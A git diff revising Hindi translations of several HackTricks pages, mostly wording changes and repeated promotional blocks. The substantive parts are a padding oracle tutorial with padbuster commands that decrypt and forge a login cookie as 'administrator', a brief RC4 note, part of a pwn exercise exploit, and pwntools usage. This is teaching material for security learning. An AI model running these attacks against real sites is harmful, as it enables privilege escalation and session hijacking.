आप [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) का उपयोग कर सकते हैं इस प्रकार की भयंकरता का उत्पीडन करने के लिए या बस करें
|
||||
आप [https://github.com/AonCyberLabs/PadBuster](https://github.com/AonCyberLabs/PadBuster) का उपयोग इस प्रकार की सुरक्षा भेदभाव का शिकार होने के लिए कर सकते हैं या बस करें
|
||||
```
|
||||
sudo apt-get install padbuster
|
||||
```
|
||||
|
@ -57,25 +58,25 @@ sudo apt-get install padbuster
|
|||
```bash
|
||||
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA=="
|
||||
```
|
||||
**कोडिंग 0** का मतलब है कि **base64** का उपयोग किया जाता है (लेकिन अन्य भी उपलब्ध हैं, मदद मेनू की जांच करें)।
|
||||
**कोडिंग 0** यह अर्थ है कि **बेस64** का उपयोग किया जाता है (लेकिन अन्य भी उपलब्ध हैं, मदद मेनू की जांच करें)।
|
||||
|
||||
आप इस सुरक्षा दोष का दुरुपयोग करके नए डेटा को एन्क्रिप्ट करने के लिए भी उपयोग कर सकते हैं। उदाहरण के लिए, यदि कुकी की सामग्री "**_**user=MyUsername**_**" है, तो आप इसे "\_user=administrator\_" में बदल सकते हैं और एप्लिकेशन के अंदर वरीयताएँ बढ़ा सकते हैं। आप `paduster` का उपयोग करके भी इसे कर सकते हैं, -plaintext** पैरामीटर को निर्दिष्ट करते हुए:
|
||||
आप इस सुरक्षा दोष का दुरुपयोग करके नए डेटा को एन्क्रिप्ट करने के लिए भी उपयोग कर सकते हैं। उदाहरण के लिए, यदि कुकी की सामग्री "**_**user=MyUsername**_**" है, तो आप इसे "\_user=administrator\_" में बदल सकते हैं और एप्लिकेशन के अंदर विशेषाधिकारों को उन्नत कर सकते हैं। आप `paduster` का उपयोग करके भी इसे कर सकते हैं, -plaintext** पैरामीटर को निर्दिष्ट करके:
|
||||
```bash
|
||||
perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator"
|
||||
```
|
||||
यदि साइट भेद्य है, तो `padbuster` स्वतः प्रयास करेगा कि पैडिंग त्रुटि कब होती है, लेकिन आप इसे **-error** पैरामीटर का उपयोग करके त्रुटि संदेश को भी दिखा सकते हैं।
|
||||
यदि साइट वंर्नरबल है, तो `padbuster` स्वचालित रूप से कोशिश करेगा कि पैडिंग त्रुटि कब होती है, लेकिन आप इसे **-error** पैरामीटर का उपयोग करके त्रुटि संदेश को भी निर्दिष्ट कर सकते हैं।
|
||||
```bash
|
||||
perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding"
|
||||
```
|
||||
## सिद्धांत
|
||||
|
||||
**सारांश में**, आप सही मानों की अनुमान लगाकर शुरू कर सकते हैं जो सभी **विभिन्न पैडिंग** बनाने के लिए उपयोग किए जा सकते हैं। फिर, पैडिंग ऑरेकल हमला शुरू होगा जो अंत से शुरू तक बाइट्स को डिक्रिप्ट करने लगेगा जिसे यह अनुमान लगाएगा कि कौन सा सही मान होगा जो **1, 2, 3** आदि का पैडिंग बनाता है।
|
||||
**सारांश में**, आप सही मानों की अनुमान लगाकर एन्क्रिप्टेड डेटा का डिक्रिप्शन शुरू कर सकते हैं जो सभी **विभिन्न पैडिंग** बनाने के लिए उपयोग किए जा सकते हैं। फिर, पैडिंग ऑरेकल हमला शुरू होगा जो अंत से शुरू तक बाइट्स को डिक्रिप्ट करने लगेगा जिसे अनुमान लगाकर पता लगाया जाएगा कि **1, 2, 3, आदि कैसे पैडिंग बनाई जा सकती है**।
|
||||
|
||||
![](<../.gitbook/assets/image (629) (1) (1).png>)
|
||||
|
||||
कल्पना करें कि आपके पास कुछ एन्क्रिप्टेड पाठ है जो **2 ब्लॉक्स** को बनाता है जिनमें से बाइट्स **E0 से E15** तक हैं।\
|
||||
**अंतिम** **ब्लॉक** (**E8** से **E15**) को **डिक्रिप्ट** करने के लिए, पूरे ब्लॉक को "ब्लॉक साइपर डिक्रिप्शन" के माध्यम से गुजरना होगा जो **इंटरमीडिएट बाइट्स I0 से I15** उत्पन्न करेगा।\
|
||||
अंततः, प्रत्येक इंटरमीडिएट बाइट पिछले एन्क्रिप्टेड बाइट्स (E0 से E7) के साथ **XORed** किया जाएगा। इसलिए:
|
||||
कल्पना करें कि आपके पास कुछ एन्क्रिप्टेड पाठ है जो **E0 से E15** तक के बाइट्स द्वारा बने **2 ब्लॉक** में ले लेता है।\
|
||||
**अंतिम ब्लॉक** (**E8** से **E15**) को **डिक्रिप्ट** करने के लिए, पूरे ब्लॉक को "ब्लॉक साइपर डिक्रिप्शन" के माध्यम से गुजरना होगा जिससे **इंटरमीडिएट बाइट्स I0 से I15** उत्पन्न होंगे।\
|
||||
अंततः, प्रत्येक इंटरमीडिएट बाइट पिछले एन्क्रिप्टेड बाइट्स (E0 से E7) के साथ **XORed** किया जाएगा। इस प्रकार:
|
||||
|
||||
* `C15 = D(E15) ^ E7 = I15 ^ E7`
|
||||
* `C14 = I14 ^ E6`
|
||||
|
@ -83,42 +84,27 @@ perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon
|
|||
* `C12 = I12 ^ E4`
|
||||
* ...
|
||||
|
||||
अब, **`E7` को `C15` `0x01` तक मॉडिफाई करना संभव है**, जो एक सही पैडिंग होगा। इसलिए, इस मामले में: `\x01 = I15 ^ E'7`
|
||||
अब, **`C15` को `0x01` तक बनाने के लिए `E7` को संशोधित करना संभव है**, जो एक सही पैडिंग होगा। इसलिए, इस मामले में: `\x01 = I15 ^ E'7`
|
||||
|
||||
इसलिए, `E'7` ढूंढने के बाद, **I15 की गणना संभव है**: `I15 = 0x01 ^ E'7`
|
||||
इसलिए, `E'7` खोजने पर, यह **संभव है कि हम I15 की गणना कर सकें**: `I15 = 0x01 ^ E'7`
|
||||
|
||||
जो हमें **C15 की गणना करने की अनुमति देता है**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
|
||||
जो हमें **`C15` की गणना करने की अनुमति देता है**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7`
|
||||
|
||||
**C15** को जानकर, अब **C14 की गणना संभव है**, लेकिन इस बार पैडिंग `\x02\x02` को ब्रूट-फोर्स करना होगा।
|
||||
**C15** को जानने के बाद, अब **`C14` की गणना करना संभव है**, लेकिन इस बार पैडिंग `\x02\x02` को ब्रूट-फोर्स करना होगा।
|
||||
|
||||
यह बीएफ पिछले एक के तुलना में इसी कठिनाई का है क्योंकि यह संभव है कि `E''15` की गणना की जाए जिसका मान 0x02 है: `E''7 = \x02 ^ I15` इसलिए बस **`E'14`** ढूंढना होगा जो **`C14` को `0x02` के बराबर बनाता है**।\
|
||||
यह बीएफ पिछले एक के तुलना में इसी कठिनाई का है क्योंकि यह संभव है कि `E''15` की गणना की जाए जिसका मान 0x02 है: `E''7 = \x02 ^ I15` इसलिए बस **`E'14`** खोजने की आवश्यकता है जो एक **`C14` को `0x02` के बराबर** उत्पन्न करता है।\
|
||||
फिर, C14 को डिक्रिप्ट करने के लिए एक ही कदम उठाएं: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`**
|
||||
|
||||
**पूरे एन्क्रिप्टेड पाठ को डिक्रिप्ट करने तक इस श्रृंखला का पालन करें।**
|
||||
**इस श्रृंखला का पालन करें जब तक आप पूरे एन्क्रिप्टेड पाठ को डिक्रिप्ट नहीं कर लेते।**
|
||||
|
||||
## सुरक्षितता की खोज
|
||||
## संक्रमण की पहचान
|
||||
|
||||
एक खाता रजिस्टर करें और इस खाते से लॉग इन करें।\
|
||||
यदि आप **कई बार लॉग इन** करते हैं और हमेशा **एक ही कुकी** प्राप्त करते हैं, तो एप्लिकेशन में **कुछ गड़बड़ हो सकती है**। लॉग इन करने पर प्रेषित कुकी **हर बार अद्वितीय होनी चाहिए**। यदि कुकी **हमेशा** **एक ही** है, तो यह संभावना है कि यह हमेशा मान्य रहेगी और उसे **अमान्य करने का कोई तरीका नहीं होगा**।
|
||||
एक खाता पंजीकृत करें और इस खाते से लॉग इन करें।\
|
||||
यदि आप **कई बार लॉग इन** करते हैं और हमेशा **एक ही कुकी** प्राप्त करते हैं, तो एप्लिकेशन में **कुछ गलती** हो सकती है। वापस भेजी गई कुकी हर बार जब आप लॉग इन करते हैं, **अद्वितीय होनी चाहिए**। यदि कुकी **हमेशा** **एक ही** है, तो यह संभावना है कि यह हमेशा मान्य रहेगी और उसे **अमान्य करने का कोई तरीका नहीं होगा**।
|
||||
|
||||
अब, यदि आप **कुकी** को **संशोधित** करने की कोशिश करते हैं, तो आप एप्लिकेशन से **त्रुटि** प्राप्त करते हैं।\
|
||||
लेकिन यदि आप पैडिंग को बीएफ करते हैं (उदाहरण के लिए पैडबस्टर का उपयोग करके), तो आपको एक और कुकी प्राप्त करने में सफलता मिलती है जो एक विभिन्न उपयोगकर्ता के लिए मान्य है। यह स्थिति पैडबस्टर के लिए अत्यधिक संभावित रूप से विकल्पयोग्य है।
|
||||
अब, यदि आप कुकी को **संशोधित** करने की कोशिश करते हैं, तो आप एप्लिकेशन से **त्रुटि** प्राप्त करते हैं।\
|
||||
लेकिन यदि आप पैडिंग को ब्रूट-फोर्स करते हैं (उदाहरण के लिए पैडबस्टर का उपयोग करके), तो आपको एक और कुकी प्राप्त करने में सफलता मिलती है जो एक विभिन्न उपयोगकर्ता के लिए मान्य होती है। यह परिदृश्य पैडबस्टर के लिए अत्यधिक संभावित है।
|
||||
|
||||
# संदर्भ
|
||||
## संदर्भ
|
||||
|
||||
* [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **PDF में HackTricks डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** हैकट्रिक्स और हैकट्रिक्स क्लाउड गिटहब रेपो में पीआर जमा करके।
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
यदि आप किसी प्लेनटेक्स्ट को RC4 का उपयोग करके एन्क्रिप्ट कर सकते हैं, तो आप उस RC4 द्वारा एन्क्रिप्ट किए गए किसी भी सामग्री को (एक ही पासवर्ड का उपयोग करके) केवल एन्क्रिप्शन फ़ंक्शन का उपयोग करके डिक्रिप्ट कर सकते हैं।
|
||||
|
|
|
@ -1,29 +1,35 @@
|
|||
# ईमेल सुरक्षा की कमियाँ
|
||||
# ईमेल सुरक्षा दोष
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।**
|
||||
* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।**
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
##
|
||||
|
||||
##
|
||||
##
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।**
|
||||
* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।**
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ</strong>!</summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# Level00
|
||||
|
@ -70,16 +71,17 @@ buf += "\x65\xd9\x0f\x01"
|
|||
r.send(buf)
|
||||
r.interactive()
|
||||
```
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
```
|
||||
pip3 install pwntools
|
||||
```
|
||||
|
@ -26,17 +27,17 @@ pwn asm -i <filepath>
|
|||
* आउटपुट प्रकार (रॉ,हेक्स,स्ट्रिंग,ईएलएफ)
|
||||
* आउटपुट फ़ाइल संदर्भ (16,32,64,लिनक्स,विंडोज...)
|
||||
* बाइट्स से बचें (न्यू लाइन्स, नल, एक सूची)
|
